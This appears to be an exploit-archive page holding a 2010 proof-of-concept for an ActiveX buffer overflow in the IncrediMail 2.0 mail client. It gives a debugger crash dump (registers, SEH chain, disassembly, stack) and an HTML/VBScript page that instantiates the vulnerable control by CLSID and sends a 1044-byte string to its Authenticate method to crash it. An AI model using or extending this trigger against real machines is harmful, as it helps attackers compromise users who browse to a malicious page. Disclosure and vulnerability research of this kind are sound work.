IncrediMail 2.0 Buffer Overflow

IncrediMail 2.0 Buffer Overflow: Posted Apr 3, 2010; Authored by d3b4g; IncrediMail version 2.0 Active-X related buffer overflow proof of concept exploit.; tags | exploit, overflow, activex, proof of concept; SHA-256 | cba87c1fcfd5fd66f749886626be5c431e2473150a128c42952c360346f45d1b; Download | Favorite | View

IncrediMail 2.0 Buffer Overflow

IncrediMail 2.0 activeX (Authenticate) bof poc

# by d3b4g
# Tested: incerdiMail 2.0
# Vendor url:http://www.incredimail.com/english/splash.aspx
# Tested on windows XP SP3
# 1-03-2010

Debugging info
--------------
Exception Code: ACCESS_VIOLATION
Disasm: 678914AE  MOV EDX,[ECX]  (ImSpoolU.dll)

Seh Chain:
--------------------------------------------------
1   678AE129   ImSpoolU.dll
2   678AE3C0   ImSpoolU.dll
3   678AE6D0   ImSpoolU.dll
4   1682950   VBSCRIPT.dll
5   7C839AD8   KERNEL32.dll



Called From                   Returns To                    
--------------------------------------------------
ImSpoolU.678914AE             8458BEC                       


Registers:
--------------------------------------------------
EIP 678914AE -> Asc: AUTH
EAX 018BDA90 -> Asc: AUTH
EBX 01C00048 -> 678B83EC
ECX 00000000
EDX 0018A812 -> F00DBAAD
EDI 00000006
ESI 018BDA90 -> Asc: AUTH
EBP 77124C1B -> 8B55FF8B
ESP 0013ED24 -> BFA7C790


Block Disassembly: 
--------------------------------------------------
6789149C  CALL 678A14A0
678914A1  MOV [ESI+4],EAX
678914A4  MOV ESI,[ESI+4]
678914A7  JMP SHORT 678914AB
678914A9  XOR ESI,ESI
678914AB  MOV ECX,[EBX+18]
678914AE  MOV EDX,[ECX]    <--- CRASH
678914B0  MOV EAX,[EDX+18]
678914B3  PUSH 0
678914B5  PUSH EDI
678914B6  PUSH ESI
678914B7  CALL EAX
678914B9  MOV ESI,EAX
678914BB  CMP ESI,-1
678914BE  JNZ SHORT 678914D2


ArgDump:
--------------------------------------------------
EBP+8  0574C085
EBP+12  D1FC408B
EBP+16  04C25DE8
EBP+20  90909000
EBP+24  FF8B9090
EBP+28  53EC8B55


Stack Dump:
--------------------------------------------------
13ED24 90 C7 A7 BF B8 DA 8B 01 48 00 C0 01 48 00 C0 01  [........H...H...]
13ED34 00 00 00 00 C9 0B 04 80 00 00 00 00 80 ED 13 00  [................]
13ED44 29 E1 8A 67 FF FF FF FF 3A 28 89 67 48 00 C0 01  [...g.......gH...]
13ED54 78 ED 13 00 A4 A6 8B 67 C8 0B 04 80 01 00 00 00  [.......g........]
13ED64 D0 C7 A7 BF 70 50 C0 01 FF FF FF FF 48 00 C0 01  [....pP......H...]

Olly snip
---------
http://img41.imageshack.us/img41/5595/incrediblellll.jpg




<HTML>
<object classid='clsid:032038A5-B655-11D3-BB7D-0050DA276194' id='target' />
<script language='vbscript'>

'Wscript.echo typename(target)

'for debugging/custom prolog
targetFile = "C:\Program Files\IncrediMail\Bin\ImSpoolU.dll"
prototype  = "Sub Authenticate ( ByVal bsServer As String ,  ByVal bsUser As String ,  ByVal bsPassword As String ,  ByVal fSecure As Long )"
memberName = "Authenticate"
progid     = "INCREDISPOOLERLib.Pop"
argCount   = 4

arg1=String(1044, "A")
arg2="defaultV"
arg3="defaultV"
arg4=1

target.Authenticate arg1 ,arg2 ,arg3 ,arg4 

</script>
</html>

Top Authors In Last 30 Days

Red Hat 205 files
Ubuntu 84 files
Gentoo 31 files
Debian 21 files
tmrswrr 10 files
Sina Kheirkhah 7 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
Google Security Research 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,078)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,350)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,266)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,658)
UNIX (9,425)
UnixWare (187)
Windows (6,666)
Other

IncrediMail 2.0 Buffer Overflow

IncrediMail 2.0 Buffer Overflow

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

IncrediMail 2.0 Buffer Overflow

Share This

IncrediMail 2.0 Buffer Overflow

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems